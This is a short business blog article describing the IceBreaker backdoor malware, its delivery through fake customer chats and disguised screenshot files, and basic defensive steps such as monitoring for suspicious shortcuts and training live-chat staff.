Social engineering has been a threat for some time, so threat actors have been looking for new ways to deceive PC users. And this is what IceBreaker does.
A backdoor threat, IceBreaker is a new malware variant whose origins are currently unknown. However, regardless of who’s behind IceBreaker, the fact remains that it’s a very real and dangerous threat to PC users. Currently, IceBreaker’s presence has mostly been observed in the gaming and gambling industries. The chances of IceBreaker moving into other industries is, as ever, highly likely.
It’s early days for IceBreaker – with the malware’s first detection coming in September 2022 – so it’s high time you get acquainted with it and put up your defenses.
What is IceBreaker?
As with all social engineering attacks, IceBreaker starts with a threat actor directly contacting an organization they have targeted. This contact is initiated through a live chat session, usually hosted on the organization’s website. Posing as a customer who is having technical problems, the threat actor eventually offers to send the chat agent a screenshot of the problem they are experiencing.
This screenshot – usually hosted on a fake website (or sometimes DropBox) – appears to be a .jpg file but is actually a .zip file. Contained within this .zip file is a shortcut file which, once clicked, downloads the IceBreaker malware. Cleverly, the shortcut file is still disguised as a picture file to deceive the target. Clicking this shortcut will not only download IceBreaker but also install and activate it, all without any user prompts.
With IceBreaker activated, the threat actor can use the malware’s JavaScript processes to conduct a number of attacks. Processes observed in attacks so far have included data harvesting, activating background processes and running scripts from remote locations to maximize the damage. So, as you can tell, IceBreaker is a significant problem.
How Do You Tackle IceBreaker?
Currently, one of the major problems with the IceBreaker attack is that many anti-malware tools fail to recognize it as dangerous. In fact, as of this time of writing, VirusTotal reports only 4 out of 60 scanners will detect IceBreaker. However, this doesn’t mean you can’t protect yourself from IceBreaker and similar attacks, just make sure you do following:
- Monitor compromised tools: if you suspect you have been attacked with IceBreaker then it’s a good idea to monitor the PC tools it can compromise. Therefore, check for new shortcut files, search for unusual activity involving msiexec.exe and any unauthorized use of tsocks.exe. Anything discovered which relates to these tools is a potential indicator of IceBreaker being active.
- Combat social engineering: your staff need to be educated on the dangers of social engineering, even those who are simply manning your live chat. Clicking links from unknown parties is a major no-no when it comes to cybersecurity and should never be considered. Even if the person urging your staff member to click a link which appears harmless, it could easily compromise your entire IT infrastructure.
For more ways to secure and optimize your business technology, contact your local IT professionals.
Read More